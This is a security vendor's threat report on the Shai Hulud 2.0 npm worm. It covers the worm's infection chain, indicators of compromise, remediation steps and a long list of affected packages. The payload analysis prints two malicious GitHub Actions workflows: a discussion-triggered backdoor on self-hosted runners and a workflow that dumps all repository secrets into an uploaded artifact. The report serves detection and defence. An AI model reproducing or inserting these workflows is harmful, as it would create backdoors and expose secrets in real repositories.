The newly uncovered “Shai Hulud 2.0” campaign is one of the most aggressive npm supply-chain attacks to date. Unlike the earlier, more contained incident, this wave introduces a fully automated worm that rapidly spreads across maintainers, repositories, and dependency graphs. More than 25,000 repositories tied to hundreds of developers have already been affected, driven by malicious preinstall scripts, workflow injections, and forced repository migrations used to harvest credentials and republish altered packages at scale. This post outlines how the new wave differs from the original attack, how the worm operates, what was impacted, and the key behaviors organizations should watch for when detecting active compromise.

Update — Ongoing Campaign Activity

The newly observed Shai Hulud–linked packages continue to appear, including major projects that were trojanized with preinstall-stage malware. Propagation is accelerating at roughly 1,000 new malicious repositories every 30 minutes, and active exfiltration of developer secrets has been confirmed across multiple ecosystems. This section will be updated as additional intelligence becomes available.

What We’re Seeing in This New Shai Hulud Wave

The new Shai Hulud wave shows a clear jump in scale and sophistication. Instead of a limited set of targeted packages, this campaign has spread across more than 25,000 repositories and hundreds of maintainers, driven by malicious pre-install scripts that fetch components like setup_bun.js and bun_environment.js to harvest credentials and deepen access into development workflows.

Upwind’s runtime insights capture this behavior directly: multiple GitHub Actions runners executed the same infection chain—npm install triggering setup_bun.js, followed by bun and a hidden TruffleHog binary harvested from .truffler-cache. These executions occurred across separate ARC runners within minutes, demonstrating fully automated propagation designed to collect secrets and metadata during every CI job.

The speed and automation of this wave turn each compromised maintainer into a point of amplification. Stolen tokens are reused instantly to republish malicious packages and inject rogue workflows, transforming Shai Hulud 2.0 into an ecosystem-wide worm rather than an isolated supply-chain incident.

image-18-760x1024
image-19-897x1024
image-20-922x1024

How the Worm Operates

Shai Hulud 2.0 spreads through a simple but highly scalable workflow: compromised npm or GitHub tokens are used to republish legitimate packages with a malicious preinstall script, which executes automatically during installation. Upwind’s detections show this script triggering a consistent chain—npm install launching setup_bun.js, followed by node and bun processes that stage the payload and run secret-harvesting tools directly on GitHub Actions runners.

The major evolution in this wave is the worm’s use of GitHub Actions as an automation and persistence layer. Injected workflows enable remote command execution and mass repository operations without relying on the initial infected environment. Once a maintainer is compromised, every installation of their packages becomes a new propagation event, with harvested tokens immediately used to republish additional modified packages. This self-reinforcing cycle is what allows Shai Hulud 2.0 to scale from a single compromise into a widespread ecosystem-level worm.

Payload Analysis

The Shai Hulud 2.0 payload extends well beyond npm lifecycle scripts. Once a maintainer is compromised, the worm executes a multi-stage payload capable of GitHub workflow injection, cloud credential harvesting, and local privilege escalation. The malware targets AWS, Azure, and GCP by scraping credentials from environment variables, config files, and cloud metadata services, and uses them to access Secret Manager services across all three clouds. It also attempts Docker-based privilege escalation on developer machines by launching privileged containers and modifying sudoers files to gain root access.

Backdoor Workflow (Discussion-Triggered Command Execution)

A workflow is added under .github/workflows/, registering the victim machine as a self-hosted runner and enabling arbitrary command execution whenever a GitHub Discussion is opened.

name: Discussion Create
on:
  discussion:
jobs:
  process:
    runs-on: self-hosted
    steps:
      - uses: actions/checkout@v5
      - name: Handle Discussion
        run: echo ${{ github.event.discussion.body }}

Copied

Secrets Exfiltration Workflow

A second workflow serializes all GitHub repository secrets, writes them to a JSON file, uploads the file as a CI artifact, and then deletes itself to minimize evidence of exfiltration.

name: Code Formatter
on:
  push
jobs:
  lint:
    runs-on: ubuntu-latest
    env:
      DATA: ${{ toJSON(secrets) }}
    steps:
      - uses: actions/checkout@v5
      - name: Run Formatter
        run: |
          echo "$DATA" > format.json
      - uses: actions/upload-artifact@v5
        with:
          path: format.json
          name: formatting

Copied

Indicators Left Behind by the Worm

As the Shai Hulud 2.0 worm propagates, it leaves behind a consistent set of operational artifacts that make compromise identifiable across CI runners and developer environments. Upwind’s telemetry surfaced several of these indicators in real GitHub Actions runners. The most important include:

• Malicious preinstall lifecycle scripts

Unexpected preinstall hooks in package.json that execute files such as setup_bun.js or bun_environment.js.

• Execution chains involving sh, bun, and TruffleHog

Upwind observed identical process trees across multiple runners:

npm install → sh -c node setup_bun.js → node setup_bun.js → bun → trufflehog.

This sequence directly reflects the Shai Hulud payload execution flow.

• TruffleHog launched from hidden cache paths

The worm consistently drops and executes TruffleHog from:

/home/runner/.truffler-cache/trufflehog

and sweeps the runner filesystem using flags like:

filesystem /home/runner --json.

• Rogue or unexpected GitHub Actions activity

Unauthorized workflow files appearing inside .github/workflows/, or the use of automation identities to trigger mass repository operations.

• Abnormal repository operations

High-volume repository creation, private-to-public migrations, or automated cloning sequences—often performed within seconds.

• Temporary secret-collection files

Dropped artifacts such as data.json, cloud.json, contents.json, environment.json, and truffleSecrets.json containing collected secrets and metadata.

• Repeated execution across ephemeral runners

Upwind detected the same infection chain on multiple ARC-based runners within minutes, indicating automated propagation rather than isolated misuse.

These IOCs provide a clear and reliable detection baseline. They map directly to the internal mechanics of Shai Hulud 2.0: automated installation-time execution, credential harvesting, workflow injection, and multi-repository propagation.

*See the appendix for the full list of affected packages.

Affected Maintainers and Packages

More than 25,000 repositories across roughly 350 maintainers were affected. The worm spread through maintainer accounts rather than targeting specific packages, resulting in both prominent and low-visibility projects being compromised. Private repositories were cloned and republished under new names, exposing code, secrets, and build configurations.

Confirmed affected ecosystems include:

  • Smaller ecosystem tools such as typeorm-orbit, orbit-nebula-draw-tools, and redux-forge
  • Zapier, with republished versions of zapier-platform-core, zapier-platform-cli, zapier-sdk, and more across 0.15.x and 18.0.x releases
  • ENS Domains, including packages such as @ensdomains/ensjs, @ensdomains/content-hash, and ethereum-ens
  • Other publishers, including @posthog/agent, @trigo/*, @orbitgtbelgium/*, and @louisle2/*

Recommended Actions

To contain Shai Hulud 2.0 and harden against similar waves, organizations should:

1. Find and remove compromised packages:

Scan developer machines, build servers, and CI runners for known affected npm versions, clear npm caches, reinstall from trusted builds, and temporarily freeze new npm package updates until exposure is understood.

2. Rotate credentials broadly:

Revoke and regenerate npm tokens, GitHub PATs, SSH keys, and cloud credentials (AWS, GCP, Azure), and enforce strong MFA and short-lived, scoped tokens for developers and automation.

3. Audit GitHub and CI/CD for persistence:

Review .github/workflows/ and pipeline configs for unexpected workflows, new branches, or automation identities; remove any that serialize secrets, run on self-hosted runners, or were recently added without clear ownership.

4. Reset and harden runners and build agents:

Recreate self-hosted runners and CI agents from clean images, ensure least-privilege permissions, and monitor for filesystem-wide scans, destructive file operations, or unexpected secret-scanning tools.

5. Tighten pipeline guardrails:

Restrict or disable npm lifecycle scripts in CI, limit outbound network access from build environments to trusted domains, and require review/approval for new packages or versions (a short cooldown before adopting newly published versions).

6. Continuously monitor runtime behavior:

Use runtime telemetry (such as Upwind) to detect anomalous install-time activity, unexpected workflow creation, secret access patterns, and command execution on CI runners so supply-chain worms are caught before they reach production.

How Upwind Protects You

  • Comprehensive dependency intelligence that maps every package and version used across your environment, automatically highlighting suspicious or newly published artifacts consistent with Shai Hulud’s republishing patterns. Upwind identifies risky dependency chains before they reach production.
  • Real-time runtime monitoring through Upwind’s sensor technology, which detects abnormal install-time activity such as unexpected lifecycle scripts, token-harvesting attempts, unauthorized workflow creation, and outbound connections initiated by malicious package payloads.
  • Behavior-based detection that analyzes developer, CI, and workload activity to surface patterns the Shai Hulud worm relies on—obfuscated script execution, unusual automation identities, rapid repository changes, and anomalies in client-side or build-time behavior.
  • Context-driven risk prioritization that correlates compromised packages with the workloads, developers, and secrets they impact. Upwind provides clear, actionable guidance so security teams can quickly isolate affected systems, rotate credentials, and restore clean dependencies.

For support in identifying compromised packages, reach out to [email protected].

You can find the full list of affected packages below:


Package

Version
02-echo0.0.7
@accordproject/concerto-analysis3.24.1
@accordproject/concerto-linter3.24.1
@accordproject/concerto-linter-default-ruleset3.24.1
@accordproject/concerto-metamodel3.12.5
@accordproject/concerto-types3.24.1
@accordproject/markdown-it-cicero0.16.26
@accordproject/template-engine2.7.2
@actbase/css-to-react-native-transform1.0.3
@actbase/native0.1.32
@actbase/node-server1.1.19
@actbase/react-absolute0.8.3
@actbase/react-daum-postcode1.0.5
@actbase/react-kakaosdk0.9.27
@actbase/react-native-actionsheet1.0.3
@actbase/react-native-devtools0.1.3
@actbase/react-native-fast-image8.5.13
@actbase/react-native-kakao-channel1.0.2
@actbase/react-native-kakao-navi2.0.4
@actbase/react-native-less-transformer1.0.6
@actbase/react-native-naver-login1.0.1
@actbase/react-native-simple-video1.0.13
@actbase/react-native-tiktok1.1.3
@alexcolls/nuxt-socket.io0.0.7 ,  0.0.8
@alexcolls/nuxt-ux0.6.2 ,  0.6.1
@antstackio/eslint-config-antstack0.0.3
@antstackio/express-graphql-proxy0.2.8
@antstackio/graphql-body-parser0.1.1
@antstackio/json-to-graphql1.0.3
@antstackio/shelbysam1.1.7
@aryanhussain/my-angular-lib0.0.23
@asyncapi/dotnet-rabbitmq-template1.0.2 ,  1.0.1
@asyncapi/edavisualiser1.2.2 ,  1.2.1
@asyncapi/go-watermill-template0.2.76 ,  0.2.77
@asyncapi/java-template0.3.6 ,  0.3.5
@asyncapi/keeper0.0.3 ,  0.0.2
@asyncapi/php-template0.1.2 ,  0.1.1
@asyncapi/python-paho-template0.2.15 ,  0.2.14
@asyncapi/server-api0.16.25 ,  0.16.24
@asyncapi/studio1.0.3 ,  1.0.2
@asyncapi/web-component2.6.7 ,  2.6.6
@browserbasehq/bb91.2.21
@browserbasehq/director-ai1.0.3
@browserbasehq/mcp2.1.1
@browserbasehq/mcp-server-browserbase2.4.2
@browserbasehq/sdk-functions0.0.4
@browserbasehq/stagehand3.0.4
@browserbasehq/stagehand-docs1.0.1
@caretive/caret-cli0.0.2
@clausehq/flows-step-httprequest0.1.14
@clausehq/flows-step-jsontoxml0.1.14
@clausehq/flows-step-mqtt0.1.14
@clausehq/flows-step-sendgridemail0.1.14
@clausehq/flows-step-taskscreateurl0.1.14
@commute/bloom1.0.3
@commute/market-data1.0.2
@commute/market-data-chartjs2.3.1
@dev-blinq/ai-qa-logic1.0.19
@dev-blinq/cucumber-js1.0.131
@dev-blinq/cucumber_client1.0.738
@dev-blinq/ui-systems1.0.93
@ensdomains/address-encoder1.1.5
@ensdomains/blacklist1.0.1
@ensdomains/buffer0.1.2
@ensdomains/ccip-read-cf-worker0.0.4
@ensdomains/ccip-read-dns-gateway0.1.1
@ensdomains/ccip-read-router0.0.7
@ensdomains/ccip-read-worker-viem0.0.4
@ensdomains/content-hash3.0.1
@ensdomains/curvearithmetics1.0.1
@ensdomains/cypress-metamask1.2.1
@ensdomains/dnsprovejs0.5.3
@ensdomains/dnssec-oracle-anchors0.0.2
@ensdomains/dnssecoraclejs0.2.9
@ensdomains/durin0.1.2
@ensdomains/durin-middleware0.0.2
@ensdomains/ens-archived-contracts0.0.3
@ensdomains/ens-avatar1.0.4
@ensdomains/ens-contracts1.6.1
@ensdomains/ens-test-env1.0.2
@ensdomains/ens-validation0.1.1
@ensdomains/ensjs4.0.3
@ensdomains/ensjs-react0.0.5
@ensdomains/eth-ens-namehash2.0.16
@ensdomains/hackathon-registrar1.0.5
@ensdomains/hardhat-chai-matchers-viem0.1.15
@ensdomains/hardhat-toolbox-viem-extended0.0.6
@ensdomains/mock2.1.52
@ensdomains/name-wrapper1.0.1
@ensdomains/offchain-resolver-contracts0.2.2
@ensdomains/op-resolver-contracts0.0.2
@ensdomains/react-ens-address0.0.32
@ensdomains/renewal0.0.13
@ensdomains/renewal-widget0.1.10
@ensdomains/reverse-records1.0.1
@ensdomains/server-analytics0.0.2
@ensdomains/solsha10.0.4
@ensdomains/subdomain-registrar0.2.4
@ensdomains/test-utils1.3.1
@ensdomains/thorin0.6.51
@ensdomains/ui3.4.6
@ensdomains/unicode-confusables0.1.1
@ensdomains/unruggable-gateways0.0.3
@ensdomains/vite-plugin-i18next-loader4.0.4
@ensdomains/web3modal1.10.2
@everreal/react-charts2.0.1 ,  2.0.2
@everreal/validate-esmoduleinterop-imports1.4.4 ,  1.4.5
@everreal/web-analytics0.0.1 ,  0.0.2
@faq-component/core0.0.4
@faq-component/react1.0.1
@fishingbooker/browser-sync-plugin1.0.5
@fishingbooker/react-loader1.0.7
@fishingbooker/react-pagination2.0.6
@fishingbooker/react-raty2.0.1
@fishingbooker/react-swiper0.1.5
@hapheus/n8n-nodes-pgp1.5.1
@hover-design/core0.0.1
@hover-design/react0.2.1
@ifelsedeveloper/protocol-contracts-svm-idl0.1.2
@ifings/design-system4.9.2
@ifings/metatron30.1.5
@kvytech/cli0.0.7
@kvytech/components0.0.2
@kvytech/habbit-e2e-test0.0.2
@kvytech/medusa-plugin-announcement0.0.8
@kvytech/medusa-plugin-management0.0.5
@kvytech/medusa-plugin-newsletter0.0.5
@kvytech/medusa-plugin-product-reviews0.0.9
@kvytech/medusa-plugin-promotion0.0.2
@kvytech/web0.0.2
@lessondesk/api-client9.12.3 ,  9.12.2
@lessondesk/babel-preset1.0.1
@lessondesk/electron-group-api-client1.0.3
@lessondesk/eslint-config1.4.2
@lessondesk/material-icons1.0.3
@lessondesk/react-table-context2.0.4
@lessondesk/schoolbus5.2.2 ,  5.2.3
@livecms/live-edit0.0.32
@livecms/nuxt-live-edit1.9.2
@louisle2/core1.0.1
@louisle2/cortex-js0.1.6
@lpdjs/firestore-repo-service1.0.1
@markvivanco/app-version-checker1.0.2 ,  1.0.1
@ntnx/passport-wso20.0.3
@ntnx/t0.0.101
@orbitgtbelgium/mapbox-gl-draw-cut-polygon-mode2.0.5
@orbitgtbelgium/mapbox-gl-draw-scale-rotate-mode1.1.1
@orbitgtbelgium/orbit-components1.2.9
@orbitgtbelgium/time-slider1.0.187
@osmanekrem/bmad1.0.6
@osmanekrem/error-handler1.2.2
@posthog/agent1.24.1
@posthog/ai7.1.2
@posthog/cli0.5.15
@posthog/clickhouse1.7.1
@posthog/core1.5.6
@posthog/hedgehog-mode0.0.42
@posthog/icons0.36.1
@posthog/lemon-ui0.0.1
@posthog/nextjs-config1.5.1
@posthog/nuxt1.2.9
@posthog/piscina3.2.1
@posthog/plugin-contrib0.0.6
@posthog/react-rrweb-player1.1.4
@posthog/rrdom0.0.31
@posthog/rrweb0.0.31
@posthog/rrweb-player0.0.31
@posthog/rrweb-record0.0.31
@posthog/rrweb-replay0.0.19
@posthog/rrweb-snapshot0.0.31
@posthog/rrweb-utils0.0.31
@posthog/siphash1.1.2
@posthog/wizard1.18.1
@postman/aether-icons2.23.4 ,  2.23.3 ,  2.23.2
@postman/csv-parse4.0.5 ,  4.0.3 ,  4.0.4
@postman/node-keytar7.9.6 ,  7.9.4 ,  7.9.5
@postman/tunnel-agent0.6.7 ,  0.6.6 ,  0.6.5
@pradhumngautam/common-app1.0.2
@pruthvi21/use-debounce1.0.3
@quick-start-soft/quick-document-translator1.4.2511142126
@quick-start-soft/quick-git-clean-markdown1.4.2511142126
@quick-start-soft/quick-markdown1.4.2511142126
@quick-start-soft/quick-markdown-compose1.4.2506300029
@quick-start-soft/quick-markdown-image1.4.2511142126
@quick-start-soft/quick-markdown-print1.4.2511142126
@quick-start-soft/quick-markdown-translator1.4.2509202331
@quick-start-soft/quick-remove-image-background1.4.2511142126
@quick-start-soft/quick-task-refine1.4.2511142126
@relyt/claude-context-core0.1.1
@seezo/sdr-mcp-server0.0.5
@seung-ju/next0.0.2
@seung-ju/openapi-generator0.0.4
@seung-ju/react-hooks0.0.2
@seung-ju/react-native-action-sheet0.2.1
@sme-ui/aoma-vevasound-metadata-lib0.1.3
@strapbuild/react-native-date-time-picker2.0.4
@strapbuild/react-native-perspective-image-cropper0.4.15
@strapbuild/react-native-perspective-image-cropper-20.4.7
@strapbuild/react-native-perspective-image-cropper-poojan310.4.6
@suraj_h/medium-common1.0.5
@thedelta/eslint-config1.0.2
@tiaanduplessis/json2.0.3 ,  2.0.2
@tiaanduplessis/react-progressbar1.0.2 ,  1.0.1
@trefox/sleekshop-js0.1.6
@trigo/atrix7.0.1
@trigo/atrix-elasticsearch2.0.1
@trigo/atrix-postgres1.0.3
@trigo/atrix-pubsub4.0.3
@trigo/atrix-soap1.0.2
@trigo/atrix-swagger3.0.1
@trigo/bool-expressions4.1.3
@trigo/eslint-config-trigo3.3.1
@trigo/fsm3.4.2
@trigo/hapi-auth-signedlink1.3.1
@trigo/pathfinder-ui-css0.1.1
@trigo/trigo-hapijs5.0.1
@trpc-rate-limiter/cloudflare0.1.4
@trpc-rate-limiter/hono0.1.4
@varsityvibe/api-client1.3.36 ,  1.3.37
@varsityvibe/utils5.0.6
@varsityvibe/validation-schemas0.6.7 ,  0.6.8
@vishadtyagi/full-year-calendar0.1.11
@voiceflow/alexa-types2.15.60 ,  2.15.61
@voiceflow/anthropic0.4.4 ,  0.4.5
@voiceflow/api-sdk3.28.58 ,  3.28.59
@voiceflow/backend-utils5.0.2 ,  5.0.1
@voiceflow/base-types2.136.3 ,  2.136.2
@voiceflow/body-parser1.21.2 ,  1.21.3
@voiceflow/chat-types2.14.59 ,  2.14.58
@voiceflow/circleci-config-sdk-orb-import0.2.1 ,  0.2.2
@voiceflow/commitlint-config2.6.2 ,  2.6.1
@voiceflow/common8.9.1 ,  8.9.2
@voiceflow/default-prompt-wrappers1.7.4 ,  1.7.3
@voiceflow/dependency-cruiser-config1.8.12 ,  1.8.11
@voiceflow/dtos-interact1.40.2 ,  1.40.1
@voiceflow/encryption0.3.3 ,  0.3.2
@voiceflow/eslint-config7.16.4 ,  7.16.5
@voiceflow/eslint-plugin1.6.2 ,  1.6.1
@voiceflow/exception1.10.2 ,  1.10.1
@voiceflow/fetch1.11.1 ,  1.11.2
@voiceflow/general-types3.2.23 ,  3.2.22
@voiceflow/git-branch-check1.4.4 ,  1.4.3
@voiceflow/google-dfes-types2.17.12 ,  2.17.13
@voiceflow/google-types2.21.12 ,  2.21.13
@voiceflow/husky-config1.3.1 ,  1.3.2
@voiceflow/logger2.4.3 ,  2.4.2
@voiceflow/metrics1.5.2 ,  1.5.1
@voiceflow/natural-language-commander0.5.2 ,  0.5.3
@voiceflow/nestjs-common2.75.2 ,  2.75.3
@voiceflow/nestjs-mongodb1.3.1 ,  1.3.2
@voiceflow/nestjs-rate-limit1.3.3 ,  1.3.2
@voiceflow/nestjs-redis1.3.1 ,  1.3.2
@voiceflow/nestjs-timeout1.3.1 ,  1.3.2
@voiceflow/npm-package-json-lint-config1.1.1 ,  1.1.2
@voiceflow/openai3.2.2 ,  3.2.3
@voiceflow/pino6.11.4 ,  6.11.3
@voiceflow/pino-pretty4.4.2 ,  4.4.1
@voiceflow/prettier-config1.10.2 ,  1.10.1
@voiceflow/react-chat1.65.4 ,  1.65.3
@voiceflow/runtime1.29.1 ,  1.29.2
@voiceflow/runtime-client-js1.17.3 ,  1.17.2
@voiceflow/sdk-runtime1.43.2 ,  1.43.1
@voiceflow/secrets-provider1.9.3 ,  1.9.2
@voiceflow/semantic-release-config1.4.2 ,  1.4.1
@voiceflow/serverless-plugin-typescript2.1.7 ,  2.1.8
@voiceflow/slate-serializer1.7.4 ,  1.7.3
@voiceflow/stitches-react2.3.3 ,  2.3.2
@voiceflow/storybook-config1.2.2 ,  1.2.3
@voiceflow/stylelint-config1.1.1 ,  1.1.2
@voiceflow/test-common2.1.1 ,  2.1.2
@voiceflow/tsconfig1.12.2 ,  1.12.1
@voiceflow/tsconfig-paths1.1.5 ,  1.1.4
@voiceflow/utils-designer1.74.19 ,  1.74.20
@voiceflow/verror1.1.5 ,  1.1.4
@voiceflow/vite-config2.6.2 ,  2.6.3
@voiceflow/vitest-config1.10.3 ,  1.10.2
@voiceflow/voice-types2.10.59 ,  2.10.58
@voiceflow/voiceflow-types3.32.45 ,  3.32.46
@voiceflow/widget1.7.18 ,  1.7.19
@zapier/ai-actions0.1.20 ,  0.1.19 ,  0.1.18
@zapier/babel-preset-zapier6.4.2 ,  6.4.1 ,  6.4.3
@zapier/browserslist-config-zapier1.0.4 ,  1.0.3 ,  1.0.5
@zapier/secret-scrubber1.1.5 ,  1.1.4 ,  1.1.3
ai-crowl-shield1.0.7
arc-cli-fc1.0.1
asyncapi-preview1.0.2 ,  1.0.1
atrix1.0.1
automation_model1.0.491
axios-builder1.2.1
axios-cancelable1.0.2 ,  1.0.1
axios-timed1.0.2 ,  1.0.1
barebones-css1.1.4 ,  1.1.3
benmostyn-frame-print1.0.1
bestgpiocontroller1.0.10
bidirectional-adapter1.2.2 ,  1.2.4 ,  1.2.5 ,  1.2.3
blinqio-executions-cli1.0.41
blob-to-base641.0.3
bun-plugin-httpfile0.1.1
bytecode-checker-cli1.0.11 ,  1.0.8 ,  1.0.9 ,  1.0.10
bytes-to-x1.0.1
calc-loan-interest1.0.4
capacitor-plugin-apptrackingios0.0.21
capacitor-plugin-purchase0.1.1
capacitor-plugin-scgssigninwithgoogle0.0.5
capacitor-purchase-history0.0.10
capacitor-voice-recorder-wav6.0.3
chrome-extension-downloads0.0.3 ,  0.0.4
claude-token-updater1.0.3
coinmarketcap-api3.1.3 ,  3.1.2
colors-regex2.0.1
command-irail0.5.4
compare-obj1.1.1 ,  1.1.2
composite-reducer1.0.4 ,  1.0.3 ,  1.0.2 ,  1.0.5
count-it-down1.0.2 ,  1.0.1
cpu-instructions0.0.14
create-director-app0.1.1
create-glee-app0.2.3 ,  0.2.2
create-hardhat3-app1.1.4 ,  1.1.3 ,  1.1.1 ,  1.1.2
crypto-addr-codec0.1.9
css-dedoupe0.1.2
dashboard-empty-state1.0.3
designstudiouiux1.0.1
devstart-cli1.0.6
dialogflow-es1.1.4 ,  1.1.3 ,  1.1.1 ,  1.1.2
discord-bot-server0.1.2
docusaurus-plugin-vanilla-extract1.0.3
dont-go1.1.2
dotnet-template0.0.3 ,  0.0.4
drop-events-on-property-plugin0.0.2
email-deliverability-tester1.1.1
enforce-branch-name1.1.3
esbuild-plugin-brotli0.2.1
esbuild-plugin-eta0.1.1
esbuild-plugin-httpfile0.4.1
eslint-config-nitpicky4.0.1
eslint-config-trigo22.0.2
eslint-config-zeallat-base1.0.4
ethereum-ens0.8.1
evm-checkcode-cli1.0.15 ,  1.0.12 ,  1.0.13 ,  1.0.14
exact-ticker0.3.5
expo-audio-session0.2.1
expressos1.1.3
fat-fingered1.0.2 ,  1.0.1
feature-flip1.0.2 ,  1.0.1
firestore-search-engine1.2.3
fittxt1.0.3 ,  1.0.2
flapstacks1.0.2 ,  1.0.1
flatten-unflatten1.0.2 ,  1.0.1
formik-error-focus2.0.1
formik-store1.0.1
fuzzy-finder1.0.5 ,  1.0.6
gate-evm-check-code22.0.3 ,  2.0.4 ,  2.0.5 ,  2.0.6
gate-evm-tools-test1.0.7 ,  1.0.8 ,  1.0.5 ,  1.0.6
gatsby-plugin-cname1.0.2 ,  1.0.1
generator-meteor-stock0.1.6
generator-ng-itobuz0.0.15
get-them-args1.3.3
github-action-for-generator2.1.28 ,  2.1.27
gitsafe1.0.5
go-template0.1.8 ,  0.1.9
gulp-inject-envs1.2.2 ,  1.2.1
haufe-axera-api-client0.0.1 ,  0.0.2
hope-mapboxdraw0.1.1
hopedraw1.0.3
hover-design-prototype0.0.5
httpness1.0.3 ,  1.0.2
hyper-fullfacing1.0.3
hyperterm-hipster1.0.7
ids-css1.5.1
ids-enterprise-mcp-server0.0.2
ids-enterprise-ng20.1.6
ids-enterprise-typings20.1.6
image-to-uri1.0.2 ,  1.0.1
insomnia-plugin-random-pick1.0.4
invo0.2.2
iron-shield-miniapp0.0.2
ito-button8.0.3
itobuz-angular0.0.1
itobuz-angular-auth8.0.11
itobuz-angular-button8.0.11
jacob-zuma1.0.2 ,  1.0.1
jaetut-varit-test1.0.2
jan-browser0.13.1
jquery-bindings1.1.3 ,  1.1.2
jsonsurge1.0.7
just-toasty1.7.1
kill-port2.0.3 ,  2.0.2
korea-administrative-area-geo-json-util1.0.7
kwami1.5.9 ,  1.5.10
lang-codes1.0.2 ,  1.0.1
license-o-matic1.2.2 ,  1.2.1
lint-staged-imagemin1.3.1 ,  1.3.2
lite-serper-mcp-server0.2.2
luno-api1.2.3
manual-billing-system-miniapp-api1.3.1
medusa-plugin-announcement0.0.3
medusa-plugin-logs0.0.17
medusa-plugin-momo0.0.68
medusa-plugin-product-reviews-kvy0.0.4
medusa-plugin-zalopay0.0.40
mod10-check-digit1.0.1
mon-package-react-typescript1.0.1
my-saeed-lib0.1.1
n8n-nodes-tmdb0.5.1
n8n-nodes-vercel-ai-sdk0.1.7
n8n-nodes-viral-app0.2.5
nanoreset7.0.2 ,  7.0.1
next-circular-dependency1.0.3 ,  1.0.2
next-simple-google-analytics1.1.1 ,  1.1.2
next-styled-nprogress1.0.4 ,  1.0.5
ngx-useful-swiper-prosenjit9.0.2
ngx-wooapi12.0.1
normal-store1.3.1 ,  1.3.4 ,  1.3.3 ,  1.3.2
obj-to-css1.0.3 ,  1.0.2
okta-react-router-65.0.1
open2internet0.1.1
orbit-boxicons2.1.3
orbit-nebula-draw-tools1.0.10
orbit-nebula-editor1.0.2
orbit-soap0.43.13
orchestrix12.1.2
package-tester1.0.1
parcel-plugin-asset-copier1.1.3 ,  1.1.2
pdf-annotation0.0.2
piclite1.0.1
pico-uid1.0.4 ,  1.0.3
pkg-readme1.1.1
poper-react-sdk0.1.2
posthog-docusaurus2.0.6
posthog-js1.297.3
posthog-node4.18.1 ,  5.13.3 ,  5.11.3
posthog-plugin-hello-world1.0.1
posthog-react-native4.11.1 ,  4.12.5
posthog-react-native-session-replay1.2.2
prime-one-table0.0.19
prompt-eng1.0.50
puny-req1.0.3
ra-auth-firebase1.0.3
ra-data-firebase1.0.8 ,  1.0.7
react-component-taggers0.1.9
react-data-to-export1.0.1
react-element-prompt-inspector0.1.18
react-favic1.0.2
react-hook-form-persist3.0.2 ,  3.0.1
react-jam-icons1.0.2 ,  1.0.1
react-keycloak-context1.0.8 ,  1.0.9
react-library-setup0.0.6
react-linear-loader1.0.2
react-micromodal.js1.0.2 ,  1.0.1
react-native-datepicker-modal1.3.1 ,  1.3.2
react-native-email2.1.1 ,  2.1.2
react-native-fetch2.0.1 ,  2.0.2
react-native-get-pixel-dimensions1.0.2 ,  1.0.1
react-native-google-maps-directions2.1.2
react-native-jam-icons1.0.2 ,  1.0.1
react-native-log-level1.2.2 ,  1.2.1
react-native-modest-checkbox3.3.1
react-native-modest-storage2.1.1
react-native-phone-call1.2.2 ,  1.2.1
react-native-retriable-fetch2.0.1 ,  2.0.2
react-native-use-modal1.0.3
react-native-view-finder1.2.2 ,  1.2.1
react-native-websocket1.0.4 ,  1.0.3
react-native-worklet-functions3.3.3
react-qr-image1.1.1
rediff1.0.5
rediff-viewer0.0.7
redux-router-kit1.2.2 ,  1.2.4 ,  1.2.3
rollup-plugin-httpfile0.2.1
sa-company-registration-number-regex1.0.2 ,  1.0.1
sa-id-gen1.0.4 ,  1.0.5
samesame1.0.3
scgs-capacitor-subscribe1.0.11
scgsffcreator1.0.5
set-nested-prop2.0.1 ,  2.0.2
shelf-jwt-sessions0.1.2
shell-exec1.1.4 ,  1.1.3
shinhan-limit-scrap1.0.3
skills-use0.1.2 ,  0.1.1
solomon-api-stories1.0.2
solomon-v3-stories1.15.6
solomon-v3-ui-wrapper1.6.1
sort-by-distance2.0.1
south-african-id-info1.0.2
stat-fns1.0.1
stoor2.3.2
super-commit1.0.1
svelte-autocomplete-select1.1.1
svelte-toasty1.1.3 ,  1.1.2
tanstack-shadcn-table1.1.5
tcsp2.0.2
tcsp-draw-test1.0.5
tcsp-test-vd2.4.4
template-lib1.1.4 ,  1.1.3
template-micro-service1.0.3 ,  1.0.2
tenacious-fetch2.3.3 ,  2.3.2
test-foundry-app1.0.4 ,  1.0.3 ,  1.0.2 ,  1.0.1
test-hardhat-app1.0.4 ,  1.0.3 ,  1.0.2 ,  1.0.1
test23112222-api1.0.1
tiaan1.0.2
token.js-fork0.7.32
trigo-react-app4.1.2
typefence1.2.2 ,  1.2.3
typeorm-orbit0.2.27
undefsafe-typed1.0.4 ,  1.0.3
uplandui0.5.4
upload-to-play-store1.0.2 ,  1.0.1
url-encode-decode1.0.2 ,  1.0.1
use-unsaved-changes1.0.9
valid-south-african-id1.0.3
vf-oss-template1.0.4 ,  1.0.3 ,  1.0.2 ,  1.0.1
vite-plugin-httpfile0.2.1
vue-browserupdate-nuxt1.0.5
web-scraper-mcp1.1.4
web-types-htmx0.1.1
web-types-lit0.1.1
webpack-loader-httpfile0.2.1
wellness-expert-ng-gallery5.1.1
wenk1.0.9 ,  1.0.10
zapier-async-storage1.0.3 ,  1.0.2 ,  1.0.1
zapier-platform-cli18.0.4 ,  18.0.3 ,  18.0.2
zapier-platform-core18.0.4 ,  18.0.3 ,  18.0.2
zapier-platform-schema18.0.4 ,  18.0.3 ,  18.0.2
zapier-scripts7.8.3 ,  7.8.4
zuper-cli1.0.1
zuper-sdk1.0.57
zuper-stream2.0.9